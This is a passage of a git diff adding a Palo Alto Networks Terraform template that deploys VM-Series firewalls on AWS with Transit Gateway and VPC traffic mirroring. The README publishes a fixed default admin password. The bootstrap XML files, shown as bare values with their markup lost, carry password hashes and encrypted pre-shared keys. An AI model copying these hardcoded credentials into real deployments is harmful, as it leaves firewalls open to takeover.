spoke1 VPC +* 2 x Ubuntu VM in spoke2 VPC +* 1 x NLB Internal Load Balancer (NGFW 3 & 4 as backend) +* 4 x S3 Buckets for VM-Series + +This is picture of the deployed environment: Note: the Panorama server does not get deployed as part of this but can be easily setup to accept connections from the VM_Series firewall by modifying the init.cfg files in the bootstrap folders. + +![2019-09-25_15-44-51](https://user-images.githubusercontent.com/21991161/65640440-02757100-dfb0-11e9-9578-a2a920a270b5.jpg) + + +### Prerequistes +1. Terraform +2. Access to AWS Console + +After deployment, the firewalls' username and password are: + * **Username:** admin + * **Password:** Pal0Alt0@123 + +### Deployment +1. Download the **TGW-VPC-Mirroring** repo to the machine running the build +2. In an editor, open **variables.tf** and set values for the following variables + +| Variable | Description | +| :------------- | :------------- | +| `aws_region` | AWS Region of Deployment| +| `aws_key` | Authentication key file for deployed VMs | +| `bootstrap_s3bucket` | Universally unigue name for Boostrap S3 Bucket for NGFW1 | +| `bootstrap_s3bucket2`| Universally unigue name for Boostrap S3 Bucket for NGFW2 | +| `bootstrap_s3bucket3`| Universally unigue name for Boostrap S3 Bucket for NGFW3 | +| `bootstrap_s3bucket4`| Universally unigue name for Boostrap S3 Bucket for NGFW4 | +| + +3. Execute Terraform +``` +$ terraform init +$ terraform plan +$ terraform apply +``` + +5. After deployment an output with connection information will be displayed: +![output](https://user-images.githubusercontent.com/21991161/65640400-e671cf80-dfaf-11e9-992f-d026cc7f0f45.jpg) + +6. To configure VPC Mirroring first select VPC/Traffic Mirroring/Mirror Filter and Create a new traffic mirror filter + +![Mirrorfilterselection](https://user-images.githubusercontent.com/21991161/65637508-eb338500-dfa9-11e9-893b-1255ed2f7135.jpg)" width="350"> + + +7. Fill in the fields and click create +![MirrorFilterOptions](https://user-images.githubusercontent.com/21991161/65637506-eb338500-dfa9-11e9-9453-c9a32bf9f276.jpg) + +8. Next select VPC/Traffic Mirror/Mirror Targets and click Create a Mirror Target +![Mirrortargetselection](https://user-images.githubusercontent.com/21991161/65637512-ebcc1b80-dfa9-11e9-9d27-a50ac1698ad3.jpg) + + +9. Fill in the fields and click create +![MirrorTargetoptions](https://user-images.githubusercontent.com/21991161/65637511-eb338500-dfa9-11e9-82b4-65cedbdeea71.jpg) + +10. Select VPC/Traffic Mirror/Mirror Sessions and click Create a Mirror Session +![MirrorSessionSelection](https://user-images.githubusercontent.com/21991161/65637510-eb338500-dfa9-11e9-9966-b4f5d1b279ca.jpg) + +11. Fill in the fields and click create +![mirrorsessionoptions](https://user-images.githubusercontent.com/21991161/65637509-eb338500-dfa9-11e9-87c9-fdfdb3a6a738.jpg) + +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/aws/TGW-VPC-Mirroring/bootstrap.tf b/aws/TGW-VPC-Mirroring/bootstrap.tf new file mode 100644 index 00000000..76438ede --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap.tf @@ -0,0 +1,97 @@ +# Create a BootStrap S3 Bucket + +resource "aws_s3_bucket" "bootstrap_bucket" { + bucket = "${var.bootstrap_s3bucket}" + acl = "private" + force_destroy = true + + tags { + Name = "bootstrap_bucket" + } +} + +#Create Folders and Upload Bootstrap Files +resource "aws_s3_bucket_object" "bootstrap_xml" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "license/authcodes" + source = "bootstrap_files/authcodes" +} + +resource "aws_s3_bucket_object" "content" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + +/* Roles, ACLs, Permissions, etc... */ + +resource "aws_iam_role" "bootstrap_role" { + name = "ngfw_bootstrap_role" + + assume_role_policy = < + + + + + $1$cweppdgb$pU2XxH3TD.QyD29.TXnVT. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$kouigbds$mrNbt/msQehCS55jxNnYa. + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + 192.168.101.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + yes + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + 18.224.86.63 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + FW-1 + 18.224.86.63 + TP_stack-A + DG + 8.8.8.8 + 999663166453480 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + any + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + yes + + + + trust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + default + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + + + + + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.1.45 + + ethernet1/1 + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.2.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.2.45 + + + + + + + ethernet1/2 + + + + + trust + + + trust + + + 10.0.0.0/8 + + + 10.0.0.0/8 + + any + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + any + + + critical + + + any + + any + client + any + disable + + + + + + + any + + + high + + + any + + any + client + any + disable + + + + + + + any + + + medium + + + any + + any + client + any + disable + + + + + + + any + + + informational + + + any + + any + client + any + disable + + + + + + + any + + + low + + + any + + any + client + any + disable + + + + + + + any + + + critical + + + any + + any + server + any + disable + + + + + + + any + + + high + + + any + + any + server + any + disable + + + + + + + any + + + medium + + + any + + any + server + any + disable + + + + + + + any + + + informational + + + any + + any + server + any + disable + + + + + + + any + + + low + + + any + + any + server + any + disable + + + + + + + + + + diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files/init-cfg.txt b/aws/TGW-VPC-Mirroring/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..8d8c673c --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files/init-cfg.txt @@ -0,0 +1,19 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname= +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary=8.8.8.8 +dns-secondary= +vm-auth-key= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files2/authcodes b/aws/TGW-VPC-Mirroring/bootstrap_files2/authcodes new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files2/authcodes @@ -0,0 +1 @@ + diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files2/bootstrap.xml b/aws/TGW-VPC-Mirroring/bootstrap_files2/bootstrap.xml new file mode 100644 index 00000000..bc3c7efb --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files2/bootstrap.xml @@ -0,0 +1,1087 @@ + + + + + + $1$frspqxow$mYHgnubHD/BO9DTqIU8eP. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$aljwjsru$ZIQ1DURHk0wBmwWTajdFu/ + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.2.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + 192.168.102.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + yes + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + 18.224.86.63 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + FW-1 + 18.224.86.63 + TP_stack-B + DG + 8.8.8.8 + 999663166453480 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 2002 + + + + + + + + + + 1002 + + + + + + + + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + any + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + + + + trust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + default + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + + + + + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.2.45 + + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.2.45 + + + + + + + ethernet1/2 + + + + + trust + + + trust + + + 10.0.0.0/8 + + + 10.0.0.0/8 + + any + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + any + + + critical + + + any + + any + client + any + disable + + + + + + + any + + + high + + + any + + any + client + any + disable + + + + + + + any + + + medium + + + any + + any + client + any + disable + + + + + + + any + + + informational + + + any + + any + client + any + disable + + + + + + + any + + + low + + + any + + any + client + any + disable + + + + + + + any + + + critical + + + any + + any + server + any + disable + + + + + + + any + + + high + + + any + + any + server + any + disable + + + + + + + any + + + medium + + + any + + any + server + any + disable + + + + + + + any + + + informational + + + any + + any + server + any + disable + + + + + + + any + + + low + + + any + + any + server + any + disable + + + + + + + + + + diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files2/init-cfg.txt b/aws/TGW-VPC-Mirroring/bootstrap_files2/init-cfg.txt new file mode 100644 index 00000000..8d8c673c --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files2/init-cfg.txt @@ -0,0 +1,19 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname= +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary=8.8.8.8 +dns-secondary= +vm-auth-key= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files3/authcodes b/aws/TGW-VPC-Mirroring/bootstrap_files3/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files3/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files3/bootstrap.xml b/aws/TGW-VPC-Mirroring/bootstrap_files3/bootstrap.xml new file mode 100644 index 00000000..0bc73e6e --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files3/bootstrap.xml @@ -0,0 +1,857 @@ + + + + + + $1$cweppdgb$pU2XxH3TD.QyD29.TXnVT. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$kouigbds$mrNbt/msQehCS55jxNnYa. + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + LB Healthcheck + + + + + + + + no + + + + + no + + + no + + + no + + + down + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + + + + + yes + yes + yes + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + 18.224.86.63 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + 18.224.86.63 + 8.8.8.8 + 382932559738703 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + mirror + + + mirror + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + default + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + + no + + + + vxlan + + + any + + + any + + + any + + + any + + + any + + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + any + + + critical + + + any + + any + client + any + disable + + + + + + + any + + + high + + + any + + any + client + any + disable + + + + + + + any + + + medium + + + any + + any + client + any + disable + + + + + + + any + + + informational + + + any + + any + client + any + disable + + + + + + + any + + + low + + + any + + any + client + any + disable + + + + + + + any + + + critical + + + any + + any + server + any + disable + + + + + + + any + + + high + + + any + + any + server + any + disable + + + + + + + any + + + medium + + + any + + any + server + any + disable + + + + + + + any + + + informational + + + any + + any + server + any + disable + + + + + + + any + + + low + + + any + + any + server + any + disable + + + + + + + + + + + diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files3/init-cfg.txt b/aws/TGW-VPC-Mirroring/bootstrap_files3/init-cfg.txt new file mode 100644 index 00000000..8d8c673c --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files3/init-cfg.txt @@ -0,0 +1,19 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname= +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary=8.8.8.8 +dns-secondary= +vm-auth-key= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files4/authcodes b/aws/TGW-VPC-Mirroring/bootstrap_files4/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files4/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files4/bootstrap.xml b/aws/TGW-VPC-Mirroring/bootstrap_files4/bootstrap.xml new file mode 100644 index 00000000..47244dd3 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files4/bootstrap.xml @@ -0,0 +1,1018 @@ + + + + + + $1$cweppdgb$pU2XxH3TD.QyD29.TXnVT. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$kouigbds$mrNbt/msQehCS55jxNnYa. + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + LB HealthCheck + + up + + + + + + + no + + + + + no + + + no + + + no + + + down + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + 